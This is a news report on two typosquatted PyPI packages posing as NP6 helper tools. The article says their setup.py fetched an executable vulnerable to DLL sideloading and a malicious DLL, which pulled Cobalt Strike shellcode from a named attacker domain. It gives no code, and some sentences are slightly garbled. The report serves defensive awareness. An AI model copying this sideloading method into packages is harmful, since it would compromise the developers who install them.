Cybersecurity researchers discovered two malicious packages in the Python Package Index (PyPI) repository that exploited a technique called DLL sideloading to evade detection by security software and execute malicious code.
The packages, called NP6HelperHttptest AND NP6HelperHttperthey were downloaded 537 and 166 times respectively before being removed.
“The latest discovery is an example of DLL sideloading performed by an open source package that suggests the scope of threats to the software supply chain is expanding,” said ReversingLabs researcher Petar Kirhmajer in a report shared with The Hacker News.
The name NP6 is noteworthy as it refers to a legitimate marketing automation solution made by ChapsVision. Specifically, the fake packages are typosquats of NP6HelperHttp and NP6HelperConfig, which are helper tools published by one of ChapsVision’s employees on PyPI.
In other words, the goal is to trick developers looking for NP6HelperHttp and NP6HelperConfig into downloading their rogue counterparts.
Contained within the two libraries is a setup.py script designed to download two files, a real executable from Beijing-based Kingsoft Corporation (“ComServer.exe”) that is vulnerable to DLL sideloading and malicious DLL loading laterally. (“dgdeskband64.dll”).
In sideloading the DLL, the goal is to avoid detection of malicious code, as previously observed in the case of an npm package called aabquerys that leveraged the same technique to execute code capable of deploying a remote access Trojan.
The DLL, for its part, reaches a domain controlled by the attacker (“us.archive-ubuntu[.]top”) to retrieve a GIF file that is, in reality, a piece of shellcode for a Cobalt Strike Beacon, a post-exploitation toolkit used for red teaming.
There is evidence to suggest that the packages are part of a larger campaign involving the distribution of similar executable files susceptible to DLL sideloading.
“Development organizations need to be aware of threats related to supply chain security and open source package repositories,” said security researcher Karlo Zanki.
“Even if they don’t use open source package repositories, that doesn’t mean threat actors won’t abuse them to impersonate companies and their software products and tools.”